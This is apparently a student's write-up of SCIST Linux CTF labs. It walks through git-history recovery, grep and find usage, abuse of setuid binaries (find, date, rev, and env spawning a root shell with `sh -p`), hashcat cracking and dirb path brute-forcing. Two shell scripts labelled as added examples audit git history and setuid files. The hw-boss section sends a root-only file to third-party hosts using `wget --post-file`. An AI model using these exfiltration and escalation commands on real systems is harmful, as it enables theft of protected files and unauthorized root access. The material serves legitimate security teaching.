# SCIST LINUX CTF Write Up

## Linux🐧

### lab-basic

First pull the course material down with git:

```bash=
git clone https://github.com/kazmatw/Kazma-Linux-Course.git
```

Inside the `lab-basic` directory there is a `flag_part1` file holding the first part of the flag:

```bash=
cat ./flag_part1
```

The rest should be somewhere under `find_here`:

```bash=
ls -aR ./find_here
```

* `-a` also lists hidden entries (names starting with `.`)
* `-R` recurses into every subdirectory

`.flag_part2` sits at the very bottom, in `./find_here/1/2/3/.../99/100`:

```bash=
cat ./find_here/1/2/3/4/5/6/7/8/9/10/11/12/13/14/15/16/17/18/19/20/21/22/23/24/25/26/27/28/29/30/31/32/33/34/35/36/37/38/39/40/41/42/43/44/45/46/47/48/49/50/51/52/53/54/55/56/57/58/59/60/61/62/63/64/65/66/67/68/69/70/71/72/73/74/75/76/77/78/79/80/81/82/83/84/85/86/87/88/89/90/91/92/93/94/95/96/97/98/99/100/.flag_part2
```

<font color="#e63946">Looks like this isn't over yet...?!</font>

Walking back up the tree, `./find_here/1/2/3/4/5/` contains a directory literally named `.,`, which is easy to miss in `ls -a` output next to the `.` and `..` entries, and `flag_part3` is inside it:

```bash=
cat ./find_here/1/2/3/4/5/.,/flag_part3
```

Joining the three parts gives the complete flag.

:::success
Flag🚩: ||`flag{w3lc0m3_t0_th3_w0rld_0f_l1nux}`||
:::

### lab-git

Look at the [commit history](https://github.com/kazmatw/Kazma-Linux-Course/commits/main/) on GitHub: there is a commit that adds the flag and a later one that removes it.

![image](https://hackmd.io/_uploads/HJmgr4qekl.png)

Open the `Add git chal` commit and the flag is right there in `flag.txt`.

The other way is to use git itself. Inside `Kazma-Linux-Course`, read the log:

```bash=
git log
```

Two commits look like they belong to this challenge:

```
commit 647fe5c46f2bdf43c9255c0d71e61098f007ad10
Author: kazma <kazmatw@gmail.com>
Date:   Sat Oct 19 08:30:33 2024 +0800

    Remove git chal

commit f5f4079bd3d5c403f63c806e51dab65a260c35d2
Author: kazma <kazmatw@gmail.com>
Date:   Sat Oct 19 08:29:40 2024 +0800

    Add git chal
```

Deleting a file in a later commit does not remove it from the repository: every object that was ever committed stays in history until that history is rewritten and garbage-collected, which is why secrets that were "deleted" from a repo are still recoverable. Check out the `Add git chal` commit:

```bash=
git checkout f5f4079bd3d5c403f63c806e51dab65a260c35d2
```

Now `flag.txt` is back!
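Checking out the old commit works, but it moves `HEAD`, and on a real repository it is easier to ask the history directly. As an added example that is not part of the original write-up, the script below builds a throwaway repository with the same add-then-remove history and shows three ways to read the deleted file without leaving the current branch: listing every path ever deleted, reading the blob from the deleting commit's parent, and grepping every commit for flag-shaped strings. The repository, the dummy identity and the sample content are all constructed here; only `git` and coreutils are needed.

```shell
#!/bin/sh
# Added example, not part of the original write-up: recover a file that a
# later commit deleted, without checking anything out. The throwaway repo
# built here mirrors the lab's "Add git chal" / "Remove git chal" history;
# the flag text is reused only as sample content.
set -eu

# Build a two-commit repo: add flag.txt, then delete it. The identity set
# here is a dummy so the commits work on a machine with no git config.
make_demo_repo() {
    repo=$(mktemp -d)
    git -C "$repo" init -q
    git -C "$repo" config user.name demo
    git -C "$repo" config user.email demo@example.invalid
    printf 'flag{git_can_time_travel}\n' > "$repo/flag.txt"
    git -C "$repo" add flag.txt
    git -C "$repo" commit -q -m 'Add git chal'
    git -C "$repo" rm -q flag.txt
    git -C "$repo" commit -q -m 'Remove git chal'
    printf '%s' "$repo"
}

# Every path deleted anywhere in history. --diff-filter=D keeps only
# deletions, --name-only prints paths, and the empty format drops the
# commit headers so the result is a bare path list.
list_deleted_files() {
    git -C "$1" log --all --diff-filter=D --name-only --pretty=format: |
        sed '/^$/d' | sort -u
}

# Print the last version of a deleted path. The newest commit that deleted
# the path is found first; <commit>^:<path> then reads the blob from that
# commit's parent, so HEAD never moves.
recover_deleted_file() {
    deleting=$(git -C "$1" log --all --diff-filter=D --pretty=format:%H -1 -- "$2")
    git -C "$1" show "${deleting}^:$2"
}

# Grep every commit reachable from any ref for flag-shaped strings. This
# also catches secrets in files whose names give nothing away.
grep_history() {
    git -C "$1" grep -h -oE 'flag[{][^}]*[}]' $(git -C "$1" rev-list --all) | sort -u
}

demo=$(make_demo_repo)
echo "deleted in history:"; list_deleted_files "$demo"
echo "recovered content:"; recover_deleted_file "$demo" flag.txt
echo "flag-shaped strings anywhere in history:"; grep_history "$demo"
rm -rf "$demo"
```

The same three commands work unchanged inside the real `Kazma-Linux-Course` clone; `git grep` over `rev-list --all` is the one to remember when auditing a repository for leaked credentials, because it does not depend on knowing the file name.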
```bash=
ls
cat flag.txt
```

:::success
Flag🚩: ||`flag{git_can_time_travel}`||
:::

~~So wouldn't it be faster to just dig the remaining flags out of the log? 🤪~~

### lab-grep

Use `find` together with `grep` to list every line that could be a flag fragment:

```bash=
find ./maybe_here -type f -exec grep -HE 'flag|\{|_|\}' {} \;
```

* `find [directory] -exec [command] \;` runs the command once for every match, with `{}` replaced by the file path
* `-type f` matches regular files only, not directories
* `grep -HE 'flag|\{|_|\}'` uses extended regex to print lines containing `flag`, `{`, `_` or `}`; `-H` prefixes each hit with its file name, so you can tell which file each fragment came from when assembling the flag

:::info
https://explainshell.com is handy for breaking down shell commands like this one.
:::

This yields three flag fragments; joined together they give

:::success
Flag🚩: ||`flag{M4st3r_0f_S34rch_4nd_M4tch1$_p0w3rfu11}`||
:::

### lab-setuid-finds

First build and start the container with Docker:

```bash=
sudo apt install docker.io
sudo docker build -t finds .
sudo docker run -it finds
```

The challenge name suggests reading the flag with `find`. `which` shows that the `find` being picked up is `/usr/local/bin/find`, not the system copy:

```bash=
which find
```

Check its permissions:

```bash=
ls -l /usr/local/bin/find
```

It really does have the setuid bit: the `s` in the owner's execute position means it runs with root's effective UID no matter who starts it.

```markdown=
-rwsr-xr-x 1 root root 204264 Oct 26 11:10 /usr/local/bin/find
```

`-exec` children inherit that effective UID, so `cat` runs as root too:

```bash=
find / -type f -name "flag.txt" -exec cat {} \;
```

:::success
Flag🚩: ||`flag{find_can_also_print!}`||
:::

### lab-setuid-revs

Same setup, but this time `rev` is the setuid binary. Run it twice to get the flag back the right way round: the first `rev` is the privileged one that reads `/flag.txt`, the second runs as the normal user and only undoes the reversal.

```bash=
rev /flag.txt | rev
```

:::success
Flag🚩: ||`flag{reverse_and_reverse_is_not_reverse}`||
:::

### lab-setuid-dates

Same again, this time `date` is setuid:

```bash=
date -f /flag.txt
```

* `-f` makes `date` read each line of the file as a date string. The flag is not a valid date, so `date` rejects it and echoes the offending line in its error message (`date: invalid date 'flag{...}'`), which turns the option into a poor man's `cat`.

:::success
Flag🚩: ||`flag{what_time_is_it?}`||
:::

### lab-setuid-idks

> idk idc IDGAF!!!
No hint from the challenge name this time 😭😭😭

Start by listing every setuid-root binary with `find`:

```bash=
find / -user root -perm -4000 2>/dev/null
```

* `-perm -4000` matches any file with the setuid bit set, whatever its other mode bits are
* `2>/dev/null` hides the permission-denied noise from directories we cannot read

These turn up:

```
/usr/bin/chsh
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/su
/usr/bin/gpasswd
/usr/bin/mount
/usr/bin/umount
/usr/bin/chfn
/usr/local/bin/env
```

Looking each one up on https://gtfobins.github.io/, only `env` is exploitable. The others are the setuid binaries every Debian-based image ships and are built to be run by unprivileged users; a setuid `env` under `/usr/local/bin` is the odd one out.

```bash=
/usr/local/bin/env /bin/sh -p
```

* `/usr/local/bin/env` is the setuid copy (plain `env` would hit it too, but only because `/usr/local/bin` comes before `/usr/bin` in `PATH`)
* `/bin/sh` is the program `env` executes; exec keeps the effective UID 0 that the setuid `env` started with
* `-p` starts the shell in privileged mode so it keeps that effective UID instead of resetting it to the real UID, which bash does by default when the two differ

```bash=
cat /flag.txt
```

:::success
Flag🚩: ||`flag{controls_the_environment_variable}`||
:::

### lab-scripts

Edit `wtf.sh`:

```bash=
vim wtf.sh
```

```bash=
#!/bin/bash
# file1..file20 are rar archives, file21..file40 are gzipped tarballs,
# file41..file60 are zip files; extract each with the matching tool.
for i in {1..60}
do
    if [ $i -le 20 ]; then
        rar e "file$i.rar"
    elif [ $i -le 40 ]; then
        tar -zxvf "file$i.tar.gz"
    else
        unzip "file$i.zip"
    fi
done
```

Make it executable and run it:

```bash=
chmod +x ./wtf.sh
./wtf.sh
```

That leaves 60 text files; grep them for the flag:

```bash=
find . -name "*.txt" -type f -exec grep -H "flag{" {} \; 2>/dev/null
```

* `-name "*.txt"` restricts the search to `.txt` files (the pattern must be quoted so the shell does not expand it first)
* `2>/dev/null` discards all error output

:::success
Flag🚩: ||`flag{now_you_can_script}`||
:::

### lab-hashcat

First identify the hash type in `hashes1.txt` with https://www.tunnelsup.com/hash-analyzer

![image](https://hackmd.io/_uploads/rkHITYqe1x.png)

Such analyzers guess from length and alphabet alone: 32 hex characters is most likely MD5, but NTLM and MD4 digests look identical, so if the first mode cracks nothing, try the others.

Crack it with hashcat and rockyou.txt. Kali ships [rockyou.txt](https://www.kali.org/tools/wordlists/) compressed, so decompress it first:

```bash=
sudo gunzip /usr/share/wordlists/rockyou.txt.gz
```

Run hashcat:

```bash=
hashcat -m 0 ./hashes1.txt /usr/share/wordlists/rockyou.txt
```

* `-m 0` selects the hash mode; `0` is MD5

This produced the following error:

```
hashcat
Device #1: Not enough allocatable device memory for this attack.
```

Shut the VM down and raise its memory to 4 GB:

![image](https://hackmd.io/_uploads/rkH4aF5eyg.png)

After rebooting it runs fine:

```
Dictionary cache built:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344392
* Bytes.....: 139921507
* Keyspace..: 14344385
* Runtime...: 2 secs

d0763edaa9d9bd2a9516280e9044d885:monkey
```

`hashes2.txt` is solved the same way; this time the hash is 64 hex characters, i.e. SHA-256:

![image](https://hackmd.io/_uploads/Bykbe5cekx.png)

```bash=
hashcat -m 1400 ./hashes2.txt /usr/share/wordlists/rockyou.txt
```

* `-m 1400` is hashcat's mode for SHA2-256

```
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385

4980b1f29fa32ff18c95d0ed931fd48e1ad43a729251d6eddb3cece705ed4d05:rockyou
```

:::success
Flag🚩: ||`flag{monkey_rockyou}`||
:::

:::info
These sites can also crack common hashes automatically:
https://www.dcode.fr/hash-function
https://crackstation.net/
:::

## Boss😈

### hw-boss

As before, start by listing the setuid binaries:

```bash=
find / -user root -perm -4000 2>/dev/null
```

`wget` is setuid, so it can read `/flag.txt` as root and send it anywhere. I asked ChatGPT and got two approaches.

#### Approach 1: save the HTTP response

httpbin.org echoes the POST body back in its JSON response, so posting the file and saving the response gets the flag onto disk:

```bash=
wget --post-file=/flag.txt https://httpbin.org/post -O response.txt
cat response.txt
```

#### Approach 2: upload the file to [webhook.site](https://webhook.site/)

```bash=
wget --post-file=/flag.txt https://webhook.site/some_random_id
```

The request, flag included, then shows up in the browser.

Both approaches hand the file to a third-party service; on anything other than a throwaway CTF box, post it to a listener you control instead.

:::success
Flag🚩: ||`flag{w93t_1s_p0weRfU1_6i3b3EcNUnJhbkrN}`||
:::

### hw-bbooss

Brute-force common paths with `dirb`:

```bash=
dirb https://lab.scist.org:30003/
```

Four paths come back:

```
---- Scanning URL: https://lab.scist.org:30003/ ----
+ https://lab.scist.org:30003/_data (CODE:200|SIZE:346)
+ https://lab.scist.org:30003/_database (CODE:200|SIZE:393)
+ https://lab.scist.org:30003/login (CODE:200|SIZE:594)
+ https://lab.scist.org:30003/Login (CODE:200|SIZE:594)
```

`/_data` holds the second part of the flag, reversed.
`/_database` exposes the admin account and its password hash as JSON.
Cracking the hash gives the password ||`naruto`||; logging in with it yields the first part of the flag.

:::success
Flag🚩: ||`flag{ddddddd_iiiiiii_rrrrrrrr_bbbbbbbb}`||
:::

## Misc

### Terminal shortcuts

* `Ctrl + a` moves the cursor to the start of the line
* `Ctrl + e` moves the cursor to the end of the line
* `Ctrl + u` deletes everything before the cursor

### shell

`>` redirect: sends output somewhere else, overwriting what was there:

```bash=
echo "Happy Halloween by Raga Man" > boo.txt
```

`>>` redirect:
sends output somewhere else, appending to what was there:

```bash=
echo "STAB the BATS" >> boo.txt
echo "ACT like a CAT" >> boo.txt
echo "OWL flying LOW" >> boo.txt
echo "TROLLS down the STROLL" >> boo.txt
echo "SCARE? who CARES?" >> boo.txt
echo "MONSTER? call the MENTORS!" >> boo.txt
```

`|` pipe: the output of the command on the left becomes the input of the command on the right:

```bash=
cat boo.txt | rev
```

```
naM agaR yb neewollaH yppaH
STAB eht BATS
TAC a ekil TCA
WOL gniylf LWO
LLORTS eht nwod SLLORT
?SERAC ohw ?ERACS
!SROTNEM eht llac ?RETSNOM
```

## Afterword

![image](https://hackmd.io/_uploads/B1m60iqeyl.png)

Solved every challenge and finished 21st, but honestly 80% of the time went into writing this write-up 😅, and I still haven't started my [Freshmen Cup write-up](https://hackmd.io/@Zantvish/NCKUCTF_Freshmen_Cup) aaaahhh
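The setuid labs above (lab-setuid-finds through lab-setuid-idks and hw-boss) all come down to the same check: list what is setuid and spot the binary that has no business being setuid. As an added example that is not part of the original write-up, the script below does that check in a reusable form: it enumerates setuid files the way `find / -perm -4000` does, compares them against the setuid binaries a stock Debian/Ubuntu image ships, and prints the outliers. Because the real scan needs a root-owned tree, it runs against a constructed temp directory carrying the paths the idks lab listed plus the two planted copies, `/usr/local/bin/env` and `/usr/local/bin/find`; the allowlist and the demo tree are assumptions of this example, not output from the lab.

```shell
#!/bin/sh
# Added example, not part of the original write-up: enumerate setuid files
# and separate the ones a stock Debian/Ubuntu image ships setuid from the
# outliers worth a GTFOBins lookup. The tree is constructed in a temp
# directory so the script runs unprivileged; on a real box pass "/" instead.
set -eu
export LC_ALL=C   # deterministic sort/comm ordering

# Setuid-root binaries that are normal on a stock image (assumed allowlist).
# Anything setuid that is missing from this list is what to investigate.
EXPECTED_SETUID='/usr/bin/chfn
/usr/bin/chsh
/usr/bin/gpasswd
/usr/bin/mount
/usr/bin/newgrp
/usr/bin/passwd
/usr/bin/su
/usr/bin/umount'

# Build a fake root: empty files with the setuid bit at the paths the lab
# listed, the two planted copies, and one non-setuid control file.
make_demo_root() {
    root=$(mktemp -d)
    for p in usr/bin/chfn usr/bin/chsh usr/bin/gpasswd usr/bin/mount \
             usr/bin/newgrp usr/bin/passwd usr/bin/su usr/bin/umount \
             usr/local/bin/env usr/local/bin/find; do
        mkdir -p "$root/$(dirname "$p")"
        : > "$root/$p"
        chmod 4755 "$root/$p"       # rwsr-xr-x, like the lab's ls -l output
    done
    : > "$root/usr/bin/ls"
    chmod 755 "$root/usr/bin/ls"    # control: executable but not setuid
    printf '%s' "$root"
}

# POSIX test(1) has a dedicated setuid-bit check; no need to parse ls -l.
is_setuid() {
    [ -u "$1" ]
}

# Same idea as `find / -perm -4000 2>/dev/null`: -perm -4000 matches any
# file with the setuid bit regardless of its other mode bits. The scanned
# root is stripped from each path so the output reads like absolute paths.
list_setuid() {
    find "$1" -type f -perm -4000 2>/dev/null | sed "s|^$1||" | sort
}

# Setuid files not on the allowlist. comm -23 prints lines that appear only
# in the first (sorted) input.
unexpected_setuid() {
    allow=$(mktemp)
    printf '%s\n' "$EXPECTED_SETUID" | sort > "$allow"
    list_setuid "$1" | comm -23 - "$allow"
    rm -f "$allow"
}

demo=$(make_demo_root)
echo "setuid files found:"
list_setuid "$demo"
echo
echo "not expected on a stock image (check these on GTFOBins):"
unexpected_setuid "$demo"
rm -rf "$demo"
```

On a live target, `list_setuid /` is the lab's one-liner; the allowlist is what turns the raw listing into a finding, and anything under `/usr/local/bin` or `/opt` with the `s` bit deserves the same attention `env` and `find` got in these labs.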